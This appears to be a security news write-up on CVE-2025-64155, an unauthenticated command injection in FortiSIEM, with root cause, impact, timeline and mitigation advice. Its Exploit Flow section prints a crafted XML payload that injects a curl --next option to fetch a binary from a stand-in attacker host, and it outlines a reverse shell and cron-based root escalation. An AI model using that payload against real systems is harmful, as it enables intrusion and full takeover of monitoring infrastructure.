~/home/news/fortisiem-critical-rce-flaw-cve-2025-64155-allows--2026-01-17
newsSaturday, January 17, 20268 min read👁 34 views

FortiSIEM Critical RCE Flaw (CVE-2025-64155) Allows Unauthenticated Root Takeover

A newly disclosed OS command injection (CWE‑78) in FortiSIEM's web interface (CVE‑2025‑64155) lets unauthenticated attackers execute arbitrary commands, gain admin shells and ultimately compromise the underlying Linux host as root. Fortinet has issued patches for 7.2.0‑7.2.5; immediate mitigation is required.

fortinetsiemcve-2025-64155remote code executioncommand injectioncritical vulnerabilitypatch

Overview

On 16 January 2026, security researchers at Horizon3.ai released a detailed analysis of a critical vulnerability in Fortinet’s Security Information and Event Management (SIEM) platform – FortiSIEM. Assigned CVE‑2025‑64155, the flaw is an OS command injection (CWE‑78) residing in the web‑based handleStorageRequest handler. Exploitation does not require authentication and can be performed remotely against any publicly reachable FortiSIEM instance.

The vulnerability enables an attacker to inject malicious arguments into a curl call executed by the internal elastic_test_url.sh script. By chaining the obscure --next flag, a crafted XML payload can overwrite the privileged phLicenseTool binary, which runs every few seconds under the admin account. The overwritten binary spawns a reverse shell, giving the attacker admin‑level code execution. A subsequent cron‑job abuse elevates the session to root, delivering full system compromise of the SIEM server.

Technical Details

CVE Information

  • CVE‑2025‑64155 – OS command injection in FortiSIEM’s web interface (CWE‑78)
  • Vendor: Fortinet
  • Vulnerability ID (Fortinet): FG‑IR‑25‑772
  • Affected versions: 7.2.0 – 7.2.5 (all deployment models)
  • Fixed in: 7.2.6, 7.3.2, 7.4.0 and later releases

Root Cause

The vulnerable code path resides in phMonitorProcess::initEventHandler, specifically the handleStorageRequest function handling the elastic storage type. User‑controlled XML elements <cluster_name> and <cluster_url> are concatenated into a shell command that ultimately invokes:

execve("/opt/phoenix/phscripts/bin/elastic_test_url.sh", ["elastic_test_url.sh", ]);

Although the script attempts to sanitize input using subprocess.run() and wrapShellToken, the underlying curl command is built as a literal string. The --next flag, introduced in curl 7.68, permits the attacker to append a second request, effectively turning the single URL argument into a command chain.

Exploit Flow

  1. Payload Delivery: An unauthenticated HTTP POST to /phmonitor/api/v1/storage with a crafted XML body.
    <request>  <type>elastic</type>  <cluster_name>any</cluster_name>  <cluster_url>http://attacker:9200 --next -o /opt/phoenix/bin/phLicenseTool http://attacker:9200</cluster_url></request>
  2. File Overwrite: The curl --next sequence downloads the attacker‑controlled binary and writes it over phLicenseTool, a privileged utility executed by the admin user every 30 seconds.
  3. Admin Shell: The overwritten phLicenseTool launches a reverse shell to the attacker’s listener, granting a foothold with admin privileges.
  4. Root Escalation: The attacker modifies the root‑only cron job /etc/cron.d/fsm-c (installed by FortiSIEM for health checks) to execute a malicious script as root. Within minutes the reverse shell is upgraded to a full root session.

Impact Analysis

The vulnerability is classified as Critical (CVSS v3.1 base score 9.8) because it satisfies the following criteria:

  • Unauthenticated Network‑Accessible Attack Vector – No credentials are needed.
  • Complete System Compromise – Attack leads to remote code execution as admin and subsequent root privilege escalation.
  • Wide Deployment Base – FortiSIEM is used by large enterprises, MSSPs, and government agencies worldwide.

Successful exploitation gives an attacker full visibility into all collected logs, the ability to tamper with alerts, and the power to pivot laterally across the network using the compromised SIEM as a trusted data source.

Timeline of Events

  • July 2025 – Initial internal discovery of a command injection in the phMonitor service (CVE‑2025‑25256).
  • August 2025 – Fortinet issues advisory for CVE‑2025‑25256.
  • September 2025 – Horizon3.ai publishes research on a second‑order injection (CVE‑2024‑23108).
  • 12 January 2026 – First public proof‑of‑concept for CVE‑2025‑64155 appears on GitHub.
  • 16 January 2026 – Horizon3.ai releases full technical write‑up; Fortinet assigns CVE‑2025‑64155 (FG‑IR‑25‑772) and releases emergency patches for 7.2.0‑7.2.5.
  • 17 January 2026 – CISA adds the vulnerability to its “Known Exploited Vulnerabilities” (KEV) catalog (pending at time of writing).

Mitigation & Recommendations

Organizations running FortiSIEM should act immediately. The following steps are recommended:

  1. Patch Immediately: Upgrade to FortiSIEM 7.2.6 or later. For all‑in‑one deployments, apply the cumulative patch package; for supervisor‑collector architectures, patch both components.
  2. Network Segmentation: Restrict access to the /phmonitor/api endpoint to trusted management subnets. Use firewalls or Web Application Firewalls (WAF) to block unauthenticated traffic.
  3. Input Validation: If patching cannot be performed within 48 hours, implement a reverse‑proxy that sanitizes XML payloads, stripping or escaping the --next flag and any characters that could break command boundaries.
  4. File Integrity Monitoring: Deploy FIM solutions (e.g., OSSEC, Tripwire) to watch critical binaries such as /opt/phoenix/bin/phLicenseTool. Alert on any changes.
  5. Audit Cron Jobs: Review /etc/cron.d/fsm-c and other FortiSIEM‑installed cron files for unexpected entries. Remove write permissions for non‑root users.
  6. Log Monitoring: Enable real‑time alerting for outbound connections from the SIEM server to unknown IPs, especially on uncommon ports.
  7. Incident Response Preparedness: Ensure your IR team has a playbook for SIEM compromise, including isolation, forensic imaging, and credential rotation.

Real‑World Impact

Beyond the immediate system takeover, the compromise of a SIEM has strategic implications:

  • Log Tampering: Attackers can delete or modify logs to hide lateral movement, making post‑incident forensics significantly harder.
  • False Alerts: By injecting fabricated events, adversaries can generate alert fatigue or mask genuine malicious activity.
  • Credential Harvesting: FortiSIEM stores API keys, service accounts, and LDAP bind credentials. Access to these assets can be leveraged to infiltrate downstream services.
  • Supply‑Chain Risks: MSSPs that manage FortiSIEM for multiple customers could inadvertently spread the breach across many tenants.

Enterprises that rely on FortiSIEM for compliance reporting (PCI‑DSS, HIPAA, GDPR) may also face regulatory fallout if the compromise leads to data loss or non‑compliance.

Expert Opinion

From a strategic standpoint, CVE‑2025‑64155 underscores a recurring theme in modern security platforms: the concentration of privileged functionality behind thinly‑protected APIs. FortiSIEM’s reliance on the legacy phMonitor service, which processes unauthenticated XML messages, creates a large attack surface that is difficult to harden retroactively.

While Fortinet’s rapid patch release is commendable, the fact that an exploit chain exists that can bypass the initial admin shell suggests deeper architectural flaws. Organizations should view this not only as a patching exercise but as a prompt to reevaluate the trust model of their SIEM deployments. Moving towards zero‑trust segmentation, employing signed binaries for critical utilities, and adopting runtime application self‑protection (RASP) can mitigate similar future threats.

In the broader industry context, this vulnerability may accelerate the shift from on‑prem SIEMs to cloud‑native security analytics platforms that enforce stronger API authentication and isolation. However, any platform that processes rich data formats (XML, JSON) must rigorously validate input at the edge to prevent command injection vectors.